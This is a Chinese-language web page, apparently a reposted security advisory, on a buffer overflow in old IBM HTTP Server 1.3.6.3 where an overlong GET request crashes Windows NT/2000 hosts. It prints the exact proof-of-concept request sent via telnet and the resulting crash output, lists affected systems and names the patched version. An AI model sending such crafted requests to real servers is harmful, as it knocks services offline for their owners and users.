|
![]() |
名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash |
|
涉及程序: GET 描述: 通过提交超长的GET哀求导致IBM HTTP Server远程溢出 具体: IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。 假如提交一个超过219个字符的 GET 哀求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证明。) 以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负 $ telnet target 80 GET /......(216个".")aaa HTTP/1.0 则系统会报告下列错误信息: ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI ON_NOT_HANDLED. ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe 注重:目标主机运行在Windows 2000下。 受影响的系统 IBM HTTP Server 1.3.6.3 - TurboLinux Turbo Linux 3.0.1 - Sun Solaris 2.6 - S.u.S.E. Linux 6.1 - S.u.S.E. Linux 6.0 - RedHat Linux 6.0 sparc - RedHat Linux 5.2 sparc - Microsoft Windows NT 4.0 - IBM AIX 4.2.1 - Caldera OpenLinux 2.2 解决方案: IBM 已经在 1.3.12 版本中解决了此问题,下载地址: http://www-4.ibm.com/software/webservers/httpservers/download.html 返回类别: 教程 上一教程: Struts学习笔记: Html标签库学习(Html基本标签) 下一教程: 让我们一起来熟悉JSP 您可以阅读与"IBM HTTP Server 远程溢出漏洞 "相关的教程: · iPlanet Web Server 缓冲区溢出漏洞 · IBM WebSphere Application Server 3.0.2 存在暴露源代码漏洞 · Sun Java Web Server 能让攻击者远程执行任意命令 · IBM WebSphere源代码暴露漏洞 · Allair JRUN 非法读取 WEB-INF 漏洞 |
![]() ![]() |
快精灵印艺坊 版权所有 |
首页![]() ![]() ![]() ![]() ![]() ![]() ![]() |